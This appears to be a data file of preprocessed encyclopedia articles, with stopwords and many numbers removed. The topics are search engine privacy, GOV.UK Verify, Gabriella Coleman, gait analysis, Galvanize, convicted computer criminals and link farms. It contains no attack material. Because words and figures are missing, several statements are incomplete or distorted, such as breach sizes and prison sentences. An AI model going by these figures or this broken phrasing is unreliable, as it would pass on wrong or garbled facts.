crucial helping search engines optimize search results individual users. search logs also help search engines development algorithms return results, google's well known pagerank. example google uses databases information refine google spell checker. privacy organizations there many believe user profiling severe invasion user privacy, organizations electronic privacy information center (epic) privacy international focused advocating user privacy rights. fact, epic filed complaint 2007 federal trade commission claiming google able acquire doubleclick grounds would compromise user privacy. users' perception privacy experiments done examine consumer behavior given information privacy retailers integrating privacy ratings search engines. researchers used search engine treatment group called privacy finder, scans websites automatically generates icon show level privacy site give consumer compares privacy policies consumer specified prefer. results experiment subjects treatment group, using search engine indicated privacy levels websites, purchased products websites gave higher levels privacy, whereas participants control groups opted products simply cheapest. study participants also given financial incentive would keep leftover money purchases. this study suggests since participants credit cards, significant aversion purchasing products sites offer level privacy wanted, indicating consumers value privacy monetarily. ethical debates many individuals scholars recognized ethical concerns regarding search engine privacy. data collection collection user data search engines viewed positive practice allows search engine personalize results. this implies users would receive relevant results, shown relevant advertisements, data, past search queries, location information, clicks, used create profile them. also, search engines generally free charge users remain afloat main sources revenue advertising, effective targeted. anti-data collection this collection user data also seen overreach private companies financial gain intrusive surveillance tactic. search engines make money using targeted advertising advertisers willing premium present receptive consumers. also, search engine collects catalogs large amounts data users, potential leaked accidentally breached. government also subpoena user data search engines databases search query database information also subpoenaed private litigants civil cases, divorces employment disputes. data privacy breaches search data leak major controversy regarding search engine privacy search data leak 2006. academic research purposes, made public list million search queries made 650,000 unique users. although assigned unique identification numbers users instead attaching names query, still possible ascertain true identities many users simply analyzing searched, including locations near names friends family members. notable example york times identified thelma arnold "reverse searching". users also sometimes "ego searches" search information internet, making even easier identify supposedly anonymous users. many search queries released incriminating seemingly extremely private, "how kill wife" "can adopt suicide attempt". this data since used several experiments attempt measure effectiveness user privacy solutions. google yahoo both google yahoo subjects chinese hack 2010. while google responded situation seriously hiring cybersecurity engineers investing heavily securing user data, yahoo took much approach. google started paying hackers find vulnerabilities 2010 took yahoo 2013 follow suit. yahoo also identified snowden data leaks common hacking target spies various nations, yahoo still give newly hired chief information security officer resources really effect change within company. 2012, yahoo hired marissa mayer, previously google employee, ceo, chose invest much security infrastructure yahoo went refuse implementation basic standard security measure force reset passwords breach.yahoo known subject multiple breaches hacks compromised large amounts user data. late 2016, yahoo announced least billion user accounts breached 2013 2014. breach 2013 compromised billion accounts breach 2014 included million accounts. data compromised breaches included personally identifiable information phone numbers, email addresses, birth dates well information like security questions (used reset passwords) encrypted passwords. yahoo made statement saying breaches result state sponsored actors, 2017, russian intelligence officers indicted united states department justice part conspiracy hack yahoo steal user data. 2016, yahoo breaches 2013 2014 largest time.in october 2018, google+ data breach potentially affected 500,000 accounts shutdown google+ platform. government subpoenas data government want subpoena user data search engines number reasons, threat user privacy. 2006, wanted part defense copa, google refused comply. while protecting online privacy children honorable goal, concerns whether government access personal data achieve times, want national security purposes; access databases search queries order prevent terrorist attacks common example this.whatever reason, clear fact search engines create maintain databases user data makes possible government access another concern regarding government access search engine user data "function creep", term refers data originally collected government national security purposes eventually used purposes, debt collection. this would indicate many government overreach. while protections search engine user privacy started developing recently, government increasingly side wants ensure search engines retain data, making users less protected data available anyone subpoena. methods increasing privacy switching search engines different, although popular, route privacy centered user take simply start using privacy oriented search engine, duckduckgo. this search engine maintains privacy users collecting data tracking users. while sound simple, users must take account trade-off privacy relevant results deciding switch search engines. results search queries different search engine search history personalization. using privacy oriented browsers mozilla known beliefs protecting user privacy firefox. mozilla firefox users capability delete tracking cookie google places computer, making much harder google group data. firefox also button called "clear private data", allows users control settings. internet explorer users option well. when using browser like google chrome safari, users also option browse "incognito" "private browsing" modes respectively. when modes, user's browsing history cookies collected. opting google, yahoo!, aol, search engines allow users behavioral targeting use. users also delete search browsing history time. ask.com search engine also askeraser, which, used, purges user data servers. deleting user's profile history data search engine logs also helps protect user privacy event government agency wants subpoena records, nothing government access. important note simply deleting browsing history delete information search engine you, companies delete data associated account clear browsing history. companies delete user data, usually delete keeping records used search engine. social network solution innovative solution, proposed researchers viejo castellà-roca, social network solution whereby user profiles distorted. plan, user would belong group, network, people search engine. every time somebody wanted submit search query, would passed another member group submit behalf someone submitted this would ideally lead search queries divvied equally members network. this way, search engine cannot make useful profile individual user group since discern query actually belonged user. delisting reordering after google spain aepd case, established people right request search engines delete personal information search results compliance european data protection regulations. this process simply removing certain search results called de-listing. while effective protecting privacy wish information accessed anyone using search engine, necessarily protect contextual integrity search results. data highly sensitive compromising, reordering search results another option people would able rank relevant certain data given point time, would alter results given someone searched name. anonymity networks sort option privacy minded users software like tor, anonymity network. functions encrypting user data routing queries thousands relays. while process effective masking addresses, slow speed results. while work mask addresses, also studies show simulated attacker software could still match search queries users even anonymized using tor. unlinkability indistinguishability unlinkability indistinguishability also well-known solutions search engine privacy, although proven somewhat ineffective actually providing users anonymity search queries. both unlinkability indistinguishability solutions anonymize search queries user made them, therefore making impossible search engine definitively link specific query specific user create useful profile them. this done couple different ways. unlinkability another user hide information address search engine, unlinkability solution. this perhaps simple easy user user using vpn, although still guarantee total privacy search engine. indistinguishability user plugin software generates multiple different search queries every real search query user makes. this indistinguishability solution, functions obscuring real searches user makes search engine cannot tell queries software's user's. then, difficult search engine data collects user things like target ads. legal rights court cases being internet search engines relatively recent creations, solid legal framework privacy protections terms search engines place. however, scholars write implications existing laws privacy general inform right privacy search engine users have. developing field law, several lawsuits respect privacy search engines expected afford users. united states fourth amendment fourth amendment well known protections offers citizens unreasonable searches seizures, katz united states (1967), protections extended cover intrusions privacy individuals, addition simply intrusion property people. privacy individuals broad term, hard imagine includes online privacy individual. sixth amendment confrontation clause sixth amendment applicable protection data government surveillance. confrontation clause essentially states defendants criminal cases right confront witnesses provide testimonial statements. search engine company like google gives information government prosecute case, witnesses google employees involved process selecting data hand government. specific employees must available confronted confrontation clause producer decides data relevant provides government they've asked for, google analyst certifies proper collection transmission data, custodian keeps records. data employees google curate trial thought testimonial statement. overall effectiveness confrontation clause search engine privacy places check government data provides defendants protection human error. katz united states this 1967 case prominent established interpretation privacy fourth amendment, specifically people reasonable expectation katz united states whether constitutional government listen record, electronically using register, conversation katz public phone booth. court ruled violate fourth amendment actions government considered "search" government needed warrant. when thinking search engine data collected users, telephone communications classified katz united states could precedent handled. katz united states, public telephones deemed "vital role" private communications. this case took place 1967, surely nowadays, internet search engines vital role private communications, people's search queries addresses thought analogous private phone calls placed public booths. united states miller this 1976 supreme court case relevant search engine privacy court ruled third parties gathered information given them, fourth amendment applicable. jayni foley argues ruling united states miller implies people cannot expectation privacy provide information third parties. when thinking search engine privacy, important people willingly provide search engines information form search queries various data points realize collected. smith maryland supreme court case smith maryland 1979, supreme court went precedent 1976 united states miller case assumption risk. court ruled fourth amendment prevent government monitoring dialed phone numbers using register qualify "search".both united states miller smith maryland cases used prevent users privacy protections offered fourth amendment records internet service providers (isps) keep. this also articulated sixth circuit guest leis case well united states kennedy case courts ruled fourth amendment protections apply customer data since willingly provided isps information using services isps. similarly, current legal structure regarding privacy assumption risk interpreted mean users search engines cannot expect privacy regards data communicate using search engines. electronic communication privacy electronic communications privacy (ecpa) 1986 passed congress effort start creating legal structure privacy protections face forms technologies, although means comprehensive considerations current technologies congress never imagined 1986 could account for. epca little regulate isps mainly prevents government agencies gathering information stored isps without warrant. what epca unsurprisingly enacted internet usage became common occurrence, anything search engine privacy protections users afforded terms search queries. gonzales google inc. background 2006 case government trying bolster defense child online protection (copa). study effective filtering software regards child pornography. this, government subpoenaed search data google, aol, yahoo!, microsoft analysis show people search information potentially compromising children. this search data government wanted included urls appeared users actual search queries users. search engines government subpoenaed produce search queries urls, google refused comply government, even request reduced size. google claimed handing logs hand personally identifiable information user identities. court ruled google hand 50,000 randomly selected urls government search queries could seed public distrust company therefore compromise business. confidentiality while strictly defined enacted congress, confidentiality common protects information shared party trust expectation privacy party share information with. content search queries logs stored thought manner information shared physician, similarly confidential, ought afforded privacy protections. europe google spain aepd european court justice ruled 2014 citizens "right forgotten" google spain agencia española protección datos case, meant right demand search engines wipe data collected them. while single court decision directly establish "right forgotten", court interpreted existing mean people right request information wiped search results provided search engine companies like google. background case spanish citizen, mario costeja gonzalez, erase google's search results revealed potentially compromising information past debts. ruling favor mario costeja gonzalez, court noted search engines significantly impact privacy rights many people google controlled dissemination personal data. this court decision claim citizens able request information completely wiped google time, rather specific types information, particularly information obstructing one's right forgotten, need easily accessible search engines. general data protection regulation (gdpr) gdpr european regulation place protect data provide privacy european citizens, regardless whether physically european union. this means countries around globe comply rules european citizen residing afforded proper protections. regulation became enforceable 2018. also references</t>
  </si>
  <si>
    <t>GOV.UK Verify</t>
  </si>
  <si>
    <t>gov.uk verify identity assurance system developed british government digital service (gds). system intended provide single trusted login across british government digital services, verifying user’s identity minutes. allows users choose several companies verify identity standard level assurance accessing central government online services. history cabinet office started work system 2011, known identity assurance programme (idap). private beta phase began february 2014, moving public beta october 2014. system declared live 2016.in june 2018, announced responsibility digital policy moved department digital, culture, media sport. responsibility development rollout gov.uk verify remained gds. certified companies third-party companies responsible carrying identity verification within scheme. first five companies known identity providers (idps) signed provide service tender issued department work pensions post office, verizon, experian, digidentity mydex cic. after tender issued cabinet office 2014, barclays, group, morpho royal mail became certified companies.while mydex participated original tender process, become certified gov.uk identity provider. 2016 verizon temporarily permanently removed list certified providers. october 2018, announced five seven identity providers barclays, digidentity, experian, post office secureidentity signed contracts months. users citizensafe group royal mail's identity service would able continue using gov.uk verify identity twelve months would need account five companies. march 2020, barclays stopped providing gov.uk verify digital identities, secureidentity experian subsequently also pulled providing identities existing customers. this left providers: post office digidentity. post office depends digidentity infrastructure operate identity provider. level assurance gov.uk verify certified companies must verify customers' identities level defined good practice guide published jointly cesg cabinet office. this level identity assurance intended sufficient support claim civil court. list connected services following services connected gov.uk verify january 2020: beyond central government local government worked local authorities since 2013 pilot gov.uk verify local government. local government services piloted july 2017 included applying free passes 'blue badge' disabled parking permits. private sector from outset, intended gov.uk verify extended private sector. while work underway 2017, still place october 2018 head kevin cunnington announced "gov.uk verify mature enough take next stage opening beyond private sector private sector take lead".cunnington announced five identity providers signed contracts months, scheme would receive funding government. development scheme would instead hands private sector. gov.uk verify options considered national health service citizen identity solution. november 2018 announced pursuing app-based solution, looking enable people gov.uk verify account systems. international work underway enable non-british citizens access service september 2018.gov.uk verify designed interoperability schemes states part eidas scheme. august 2018, gov.uk verify took first step towards enabling british residents gov.uk verify account online public services countries. scheme 'notified' 2019. criticism gov.uk verify various targets platform originally launch 2012, 2016. success rate verifying individuals october 2018.it meet identity requirements government departments, identifying intermediaries businesses.the infrastructure projects authority (ipa) reviewed verify july 2018, noting department's reluctance continue funding project, another report later year requesting gov.uk verify identity assurance programme terminated.in october 2018, platt, shadow minister cabinet office, said £130 million spent developing gov.uk verify. evolution december 2018, announced next months would working standards bodies, identity providers private sector make standards easier follow accept types identity evidence remove barriers reuse digital identities across public private sector make better government data help people prove online open market based standards-based approachcomputer weekly expressed concern approach august 2019.in april 2020, funding gov.uk verify extended months covid-19 pandemic.in august 2020, trade association techuk criticised government's progress since 2019 slow opaque.in april 2021, platform extended years.hmrc ceased verify, available limited number online services parallel government gateway sign-in, effect april 2022. also digital identity electronic authentication federated identity government gateway identity management national strategy trusted identities cyberspace equivalent initiative) open identity exchange privacy design strong authentication further reading whitley, edgar (november 2018), trusted digital identity provision: gov.uk verify's federated approach (pdf), center global development london school economics political science references this article incorporates text published british open government licence: "dashboard gov.uk verify gov.uk". www.gov.uk. retrieved january 2020. external links introducing gov.uk verify video showing gov.uk verify works gov.uk verify twitter gov.uk verify blog gov.uk verify performance dashboard identity assurance programme briefing paper national audit office investigation verify, march 2019 national audit office</t>
  </si>
  <si>
    <t>List of Tor onion services</t>
  </si>
  <si>
    <t>Gabriella Coleman</t>
  </si>
  <si>
    <t>enid gabriella coleman (usually known gabriella coleman biella; born 1973) anthropologist, academic author whose work focuses cultures hacking online activism, particularly anonymous. previously held wolfe chair scientific technological literacy mcgill university, montreal, quebec, canada currently full professor harvard university's department anthropology. education after completing high school education john's school juan, puerto rico, coleman graduated bachelor arts religious studies columbia university 1996. moved university chicago completed master arts socio-cultural anthropology august 1999. awarded ph.d socio-cultural anthropology dissertation social construction freedom free open source software: hackers, ethics, liberal tradition 2005. academic career coleman held positions including postdoctoral fellowship center cultural analysis, rutgers university izaak walton killam memorial postdoctoral fellowship, program science, technology society, university alberta appointed assistant professor media, culture communication york university september 2007.during 2010–2011, coleman spent time working institute advanced study princeton recipient "2010–11 ginny robert loughlin founders' circle member school social science".in january 2012, moved montreal, quebec, canada take wolfe chair scientific technological literacy mcgill university. year, also spoke webstock 2012 wellington, zealand. study anonymous coleman's work anonymous becoming regular media commentator addition academic publications. july 2010, coleman made reference anonymous "project" "operation" chanology church scientology uses would become central motif descriptions group, "trickster archetype", argues "often clean savory character, perhaps vital social renewal". coleman states "been thinking linkages trickster hackers" years" stay hospital read trickster makes this world: mischief, myth, lewis hyde: within first pages, undeniable: many links made trickster hacking. many figures, push boundaries sorts: upset ideas propriety property; sharpened wits sometimes play, sometimes political ends; trapped cunning (which happens time tricksters! that learn); remake world, technically, socially, legally includes software, licensing even forms literature. coleman's theory concerning anonymous (and associated groups 4chan) trickster moved academia mainstream media. recent references include three-part series anonymous wired magazine york times. coleman also critical mainstream coverage anonymous. crime? transgressive politics hacking anonymous (with michael ralph), coleman responds article group joseph menn financial times noting: critical engagement issues raises likely yield important lessons scholarly journalistic approaches digital media, protest politics, cyber-security. instead merely depicting hackers virtual pamphleteers free speech digital outlaws, need start asking specific questions hackers embrace particular attitudes toward different kinds laws, explore greater detail hoping achieve, take greater care examining consequences. weirdness free: logic anonymous online army, agent chaos, seeker justice, triple canopy 2012 january, coleman's first major piece length group draws range observations describes "everything nothing once". even coleman admits fully understand anonymous, told bbc: never complete certainty what's going who's involved, "not able fully understand who's behind mask" gives anonymous political power. coleman's multi-year ethnographic research anonymous culminated publication hacker hoaxer whistleblower spy: many faces anonymous. awarded american anthropological association's diane forsythe prize described alan moore, co-author vendetta "brilliantly lucid", book charts history, rise, impact anonymous movement. even though book deploys journalistic writing conventions, coleman continues analytically frame activity trolling anonymous terms tricksterism. argues book tricksters "are well positioned impart lessons—regardless intent.". continues note: “their actions need accepted, much less endorsed, extract positive value. edifying liberating terrifying perspectives, symptomatic underlying problems deserve scrutiny, functioning positive force toward renewal, distorting confusing shadows.” white nationalist troll weev, also treated foil anonymous, presented example terrifying side trickstermism, anonymous, argues coleman, represents positive side, force political hope renewal. issues tricksters, trolls anonymous explored group anthropologists special issue journal reviewed coleman's book. publications (2017). "from internet farming weapons geek". current anthropology. (1): 91–102. doi:10.1086/688697. s2cid 151855034. (2014). hacker, hoaxer, whistleblower, spy: many faces anonymous. london: verso books. isbn 9781781685839. (2013). "anonymous context: politics power behind mask" (pdf). internet governance papers. waterloo, ontario: centre international governance innovation. 1–21. (2013). coding freedom ethics aesthetics hacking (pdf). princeton: princeton university press. isbn 978-0-691-14460-3. (2012). phreaks, hackers, trolls: politics transgression spectacle". mandiberg, michael (ed.). social media reader. york, york: york university press. 99–119. isbn 9780814764060. (2010). "ethnographic approaches digital media". annual review anthropology. 487–505. doi:10.1146/annurev.anthro.012809.104945. (2010). "the hacker conference: ritual condensation celebration lifeworld" (pdf). anthropological quarterly. (1): 47–72. doi:10.1353/anq.0.0112. s2cid 142356750. golub, alex september 2008). "hacker practice: moral genres cultural articulation liberalism" (pdf). anthropological theory. (3): 255–277. doi:10.1177/1463499608093814. s2cid 145423454. (2008). "20. politics rationality: psychiatric survivor's challenge psychiatry" (pdf). costa, beatriz; philip, kavita (eds.). tactical biopolitics art, activism, technoscience. cambridge, massachusetts: press. 341–364. isbn 9780262042499. (2005). social construction freedom free open source software: hackers, ethics, liberal tradition (thesis). chicago, illinois: university chicago. 3181325. (2001). "high‐tech guilds global capital". anthropology work review. (1): 28–32. doi:10.1525/awr.2001.22.1.28. references external links official website riley, theresa april 2013). "are geeks guardians civil liberties?". moyers public affairs television. retrieved april 2013. appearances c-span</t>
  </si>
  <si>
    <t>Gait analysis</t>
  </si>
  <si>
    <t>gait analysis systematic study animal locomotion, specifically study human motion, using brain observers, augmented instrumentation measuring body movements, body mechanics, activity muscles. gait analysis used assess treat individuals conditions affecting ability walk. also commonly used sports biomechanics help athletes efficiently identify posture-related movement-related problems people injuries. study encompasses quantification (introduction analysis measurable parameters gaits), well interpretation, i.e. drawing various conclusions animal (health, age, size, weight, speed etc.) gait pattern. history pioneers scientific gait analysis aristotle motu animalium gait animals) much later 1680, giovanni alfonso borelli also called motu animalium ii). 1890s, german anatomist christian wilhelm braune otto fischer published series papers biomechanics human gait loaded unloaded conditions.with development photography cinematography, became possible capture image sequences reveal details human animal locomotion noticeable watching movement naked eye. eadweard muybridge étienne-jules marey pioneers developments early 1900s. example, serial photography first revealed detailed sequence horse "gallop", usually misrepresented paintings made prior discovery. although much early research done using film cameras, widespread application gait analysis humans pathological conditions cerebral palsy, parkinson's disease, neuromuscular disorders, began 1970s availability video camera systems could produce detailed studies individual patients within realistic cost time constraints. development treatment regimes, often involving orthopedic surgery, based gait analysis results, advanced significantly 1980s. many leading orthopedic hospitals worldwide gait labs routinely used design treatment plans follow-up monitoring. development modern computer based systems occurred independently late 1970s early 1980s several hospital based research labs, collaborations aerospace industry. commercial development soon followed emergence commercial television later infrared camera systems mid-1980s. 2018 proposal kinetic summary measure, gait kinetic index. process equipment typical gait analysis laboratory several cameras (video infrared) placed around walkway treadmill, linked computer. patient markers located various points reference body (e.g., iliac spines pelvis, ankle malleolus, condyles knee), groups markers applied half body segments. patient walks catwalk treadmill computer calculates trajectory marker three dimensions. model applied calculate movement underlying bones. this gives complete breakdown movement joint. common method helen hayes hospital marker set, total markers attached lower body. marker motions analyzed analytically, provides angular motion joint.to calculate kinetics gait patterns, labs floor-mounted load transducers, also known force platforms, measure ground reaction forces moments, including magnitude, direction location (called center pressure). spatial distribution forces measured pedobarography equipment. adding known dynamics body segment enables solution equations based newton–euler equations motion permitting computations forces moments force joint every stage gait cycle. computational method known inverse dynamics.this kinetics, however, result information individual muscles muscle groups, extensor flexors limb. detect activity contribution individual muscles movement, necessary investigate electrical activity muscles. many labs also surface electrodes attached skin detect electrical activity electromyogram (emg) muscles. possible investigate activation times muscles and, degree, magnitude activation—thereby assessing contribution gait. deviations normal kinematic, kinetic patterns used diagnose specific pathologies, predict outcome treatments, determine effectiveness training programs factors parameters gait analysis modulated modified many factors, changes normal gait pattern transient permanent. factors various types: extrinsic: terrain, footwear, clothing, cargo intrinsic: sex, weight, height, age, etc. physical: weight, height, physique psychological: personality type, emotions physiological: anthropometric characteristics, i.e., measurements proportions body pathological: example trauma, neurological diseases, musculoskeletal anomalies, psychiatric disordersthe parameters taken account gait analysis follows: step length stride length cadence speed dynamic base progression line foot angle angle squat performance techniques gait analysis involves measurement, measurable parameters introduced analyzed, interpretation, conclusions subject (health, age, size, weight, speed, etc.) drawn. analysis measurement following: temporal spatial consists calculation speed, length rhythm, pitch, these measurements carried through: stopwatch marks ground. walking pressure mat. range laser sensors scanning plane centimeters floor. inertial sensors software interpret gyroscopes accelerometric data. kinematics chronophotography basic method recording movement. strobe lighting known frequency used past analysis gait single photographic images. cine film video recordings using footage single multiple cameras used measure joint angles velocities. this method aided development analysis software greatly simplifies analysis process allows analysis three dimensions rather dimensions only. passive marker systems, using reflective markers (typically reflective balls), allows accurate measurement movements using multiple cameras (typically five twelve cameras), simultaneously. cameras utilize high-powered strobes (typically red, near infrared infrared) matching filters record reflection markers placed body. markers located palpable anatomical landmarks. based angle time delay original reflected signal, triangulation marker space possible. software used create three dimensional trajectories markers subsequently given identification labels. computer model used compute joint angles relative marker positions labeled trajectories. these also used motion capture motion picture industry. active marker systems similar passive marker system "active" markers. these markers triggered incoming infra signal respond sending corresponding signal own. this signal used triangulate location marker. advantage system passive individual markers work predefined frequencies therefore, "identity". this means post-processing marker locations required, however, systems tend less forgiving out-of-view markers passive systems. inertial (cameraless) systems based mems inertial sensors, biomechanical models, sensor fusion algorithms. these full-body partial body systems used indoors outdoors regardless lighting conditions. markerless gait capture markerless gait capture systems utilize color cameras 2.5d depth sensors (i.e. kinect) directly calculate body joint positions sequence images. markerless system allows non-invasive human gait analysis natural environment without marker attachment. eliminating markers expand applicability human gait measurement analysis techniques, considerably reduce preparation time, enable efficient accurate motion assessment kinds applications. currently, main markerless system video-based motion capture monocular camera multiple camera studio. nowadays, depth sensor-based gait analysis clinical applications becomes popular. since depth sensors measure depth information provide 2.5d depth image, effectively simplified task foreground/background subtraction significantly reduced pose ambiguities monocular human pose estimation. pressure measurement pressure measurement systems additional measure gait providing insights pressure distribution, contact area, center force movement symmetry sides. these systems typically provide pressure information; additional information available systems force, timing spatial parameters. different methods assessing pressure available, like pressure measurement walkway (longer length capture foot strikes), well in-shoe pressure measurement systems (where sensors placed inside shoe). many pressure measurement systems integrate additional types analysis systems, like motion capture, force plates provide comprehensive gait analysis. kinetics study forces involved production movements. dynamic electromyography study patterns muscle activity gait. applications gait analysis used analyze walking ability humans animals, technology used following applications: medical diagnostics pathological gait reflect compensations underlying pathologies, responsible causation symptoms itself. cerebral palsy stroke patients commonly seen gait labs. study gait allows diagnoses intervention strategies made, well permitting future developments rehabilitation engineering. aside clinical applications, gait analysis used professional sports training optimize improve athletic performance. gait analysis techniques allow assessment gait disorders effects corrective orthopedic surgery. options treatment cerebral palsy include artificial paralysis spastic muscles using botox lengthening, re-attachment detachment particular tendons. corrections distorted bony anatomy also undertaken (osteotomy). chiropractic osteopathic uses observation gait also beneficial diagnoses chiropractic osteopathic professions hindrances gait indicative misaligned pelvis sacrum. sacrum ilium biomechanically move opposition other, adhesions sacrospinous sacrotuberous ligaments (among others) suggest rotated pelvis. both doctors chiropractic osteopathic medicine gait discern listing pelvis employ various techniques restore full range motion areas involved ambulatory movement. chiropractic adjustment pelvis shown trend helping restore gait patterns osteopathic manipulative therapy (omt). comparative biomechanics studying gait non-human animals, insight gained mechanics locomotion, diverse implications understanding biology species question well locomotion broadly. gait biometrics gait recognition type behavioral biometric authentication recognizes verifies people walking style pace. advances gait recognition development techniques forensics since person gait defined unique measurements locations ankle, knee, hip. surveillance 2018, reports government china developed surveillance tools based gait analysis, allowing uniquely identify people, even faces obscured. popular media chesterton premised father brown mysteries, "the queer feet", gait recognition. cory doctorow makes much gait recognition security technique used high school book little brother. arthur conan doyle sherlock holmes gait analysis identify height rache killer study scarlet. movie mission: impossible rogue nation features gait analysis, scene benji dunn must infiltrate facility uses gait analysis software part security protocol. also biometric points gait analysis: normal pathological function, second edition gait abnormality rating scale gait deviations multilinear principal component analysis multilinear subspace learning pattern recognition terrestrial locomotion animals comparison orthotics references further reading gait analysis: normal pathological function, second edition. authors: jacquelin perry judith burnfield biomechanics motor control human movement. author: david winter, fourth edition. published john wiley sons, york. gait analysis. authors: david levine, richards, michael whittle. observational gait analysis. author: amigos research education center gait analysis: theory application. authors: rebecca craik carol oatis, "the treatment gait problems cerebral palsy" clinics developmental medicine 164-165, edited james gage, 2004. forensic gait analysis: principles methods. editors: birch nirenberg vernon birch press, taylor francis group, 2020. external links clinical gait analysis</t>
  </si>
  <si>
    <t>Galvanize (software company)</t>
  </si>
  <si>
    <t>galvanize (formerly known services ltd.) privately owned software service (saas) company founded headquartered vancouver, british columbia, canada. company builds security, risk management, compliance audit software governance, risk management, compliance (grc) market. galvanize offices vancouver (hq), singapore, london, tokyo, secaucus, jersey. they also number representatives partners around world, including throughout africa, france, malaysia, philippines, indonesia, hong kong, china australia. history while working faculty commerce's division accounting university british columbia 1972, hartmut will (hart will) developed first interactive audit software, "audit command language" (acl) data bank model bank audits.in 1987, will son, harald will, launched commercial business services ltd. harald will grew company founder inviting laurie schultz assume role president 2011.in 2012, expanded electronic work papers market acquisition workpapers.com, zitting. acquisition signaled shift company towards cloud-based, saas business model.acl acquired digital design firm artletic 2015.acl took first outside funding form million strategic minority investment growth equity team norwest december 2017.in november 2018, company named "canada's employers" mediacorp canada inc.acl acquired rsam february 2019.in march 2019, company named "canada's best managed companies."in 2019, company rebranded galvanize.in march 2020, galvanize named "canada's best managed companies" second consecutive year. galvanize also named leader forrester wave: governance, risk, compliance software 2020.in february 2021, galvanize announced sold diligent corp. products services highbond platform highbond platform designed security, risk management, compliance, audit professionals. using organization's data, professionals platform manage threats assess risk measure controls monitor compliance expand assurance coverage.highbond cloud-based platform rely third-party vendors hosted amazon's infrastructure. leadership laurie schultz, president (2011-) zitting, chief product strategy officer (2019-) previously chief customer experience officer (2018-2019); previously chief product officer (2015-2018); previously product management design (2011-2015) keith cerny, chief people officer (2019-); previously chief technology officer (2016-2019) john lauinger, general counsel (2001-) awards accolades november 2018, company named canada's employers mediacorp canada inc.in march 2019, company named canada's best managed companies. also sarbanes–oxley financial audit references external links official website "2009 audit benchmarking study". institute internal auditors. march 2009. archived original 2012-07-12. retrieved december 2012. mccafferty, dennis january 2010). "u.s. military looks better control costs business analytics, better bi". smarter technology. archived original 2012-07-12. retrieved december 2012. krell, eric november 2009). "your internal audit's vital signs". business finance magazine. retrieved december 2012. mccann, david november 2009). "doing internal audit-management dance". cfo.com. retrieved december 2012. kelly, susan november 2009). "monitoring monitors". treasury risk. retrieved december 2012. mccann, david september 2009). "internal audit: continuous conundrum". cfo. retrieved december 2012. baker, neil (august 2009). "software trend spotting". internal auditor. archived original 2012. retrieved december 2012. mccann, david; stuart, alix july 2009). "the 24/7 audit". magazine. retrieved december 2012. krell, eric july 2009). "monitoring matters". business finance magazine. retrieved december 2012. wins best application technology bctia's annual technology impact awards (techvibes)</t>
  </si>
  <si>
    <t>List of computer criminals</t>
  </si>
  <si>
    <t>convicted computer criminals people caught convicted computer crimes breaking computers computer networks. computer crime broadly defined criminal activity involving information technology infrastructure, including illegal access (unauthorized access), illegal interception technical means non-public transmissions computer data within computer system), data interference (unauthorized damaging, deletion, deterioration, alteration suppression computer data), systems interference (interfering functioning computer system inputting, transmitting, damaging, deleting, deteriorating, altering suppressing computer data), misuse devices, forgery identity theft) electronic fraud. infancy hacker subculture computer underground, criminal convictions rare informal code ethics followed white hackers. proponents hacking claim motivated artistic political ends, often unconcerned criminal means achieve them. white hackers break past computer security non-malicious reasons damage, akin breaking house looking around. they enjoy learning working computer systems, experience gain deeper understanding electronic security. computer industry matured, individuals malicious intentions (black hats) would emerge exploit computer systems personal profit.convictions computer crimes, hacking, began early 1984 case 414s area code milwaukee. case, teenagers broke number high-profile computer systems, including alamos national laboratory, sloan-kettering cancer center security pacific bank. 1984, 414s, gerald wondra, sentenced years probation. may, 1986, first computer trespass conviction result jail sentence handed michael princeton wilkerson, received weeks jail infiltration microsoft, sundstrand corp., kenworth truck resources conservation co.in 2006, prison term nearly five years handed jeanson james ancheta, created hundreds zombie computers bidding giant networks botnets. sold botnets highest bidder turn used denial-of-service (dos) attacks.as 2012, longest sentence computer crimes albert gonzalez years. next longest sentences years butler, months brian salcedo 2004 upheld 2006 u.s. circuit court appeals, months kevin mitnick 1999. computer criminals also timeline computer security hacker history references external links "hacker high: stories teenage hackers getting system". archived original march 2016. retrieved september 2008.{{cite web}}: maint: bot: original status unknown (link) "cusse list convicted hackers". archived original 2013. retrieved february 2012.</t>
  </si>
  <si>
    <t>Link farm</t>
  </si>
  <si>
    <t>world wide web, link farm group websites hyperlink sites group purpose increasing rankings. graph theoretic terms, link farm clique. although link farms created hand, created automated programs services. link farm form spamming index search engine (sometimes called spamdexing). other link exchange systems designed allow individual websites selectively exchange links relevant websites considered form spamdexing. search engines require ways confirm page relevancy. known method examine one-way links coming directly relevant websites. process building links confused listed link farms, latter requires reciprocal return links, often renders overall backlink advantage useless. this oscillation, causing confusion vendor site promoting site. history link farms first developed search engine optimizers (seos) 1999 take advantage inktomi search engine's dependence upon link popularity. although link popularity used search engines help establish ranking order search results, inktomi engine time maintained indexes. search results produced primary index limited approximately million listings. pages inbound links fell inktomi index monthly basis. inktomi targeted manipulation link farms used several independent popular search engines. yahoo!, popular search service, also used inktomi results supplement directory search feature. link farms helped stabilize listings primarily online business sites natural links larger, stable sites inktomi index. link farm exchanges first handled informal basis, several service companies founded provide automated registration, categorization, link page updates member sites. when google search engine became popular, search engine optimizers learned google's ranking algorithm depended part link-weighting scheme called pagerank. rather simply count inbound links equally, pagerank algorithm determines links valuable others, therefore assigns weight others. link farming adapted help increase pagerank member pages. however, link farms became susceptible manipulation unscrupulous webmasters joined services, received inbound linkage, found ways hide outbound links avoid posting links sites all. link farm managers implement quality controls monitor member compliance rules ensure fairness. alternative link farm products emerged, particularly link-finding software identified potential reciprocal link partners, sent template-based emails offering exchange links, created directory-like link pages sites, hope building link popularity pagerank. these link farms sometimes considered spamdexing strategy. search engines countered link farm movement identifying specific attributes associated link farm pages filtering pages indexing search results. cases, entire domains removed search engine indexes order prevent influencing search results. blog network private blog network (pbn) group blogs owned entity. blog network either group loosely connected blogs, group blogs owned company. purpose network usually promote sites outside network therefore increase search engine rankings advertising revenue generated online advertising sites links september 2014, google targeted private blog networks (pbns) manual action ranking penalties. this served dissuade search engine optimization online marketers using pbns increase online rankings. "thin content" warnings closely tied panda focuses thin content on-page quality. pbns history targeted google therefore safest option. since google search blog networks, always linked together. fact, interlinking blogs could help google single exposed blog could reveal whole blog network looking outbound links. blog network also refer central website, wordpress, user creates account able blog. created blog forms part network uses either subdomain subfolder main domain, although ways entirely autonomous. this also known hosted blog platform usually uses free wordpress multisite software. hosted blog networks also known networks, since became popular rise second phase development. also references external links google information webmasters yahoo!'s search content quality guidelines dirty little secrets search york times</t>
  </si>
  <si>
    <t>Gigya</t>
  </si>
  <si>
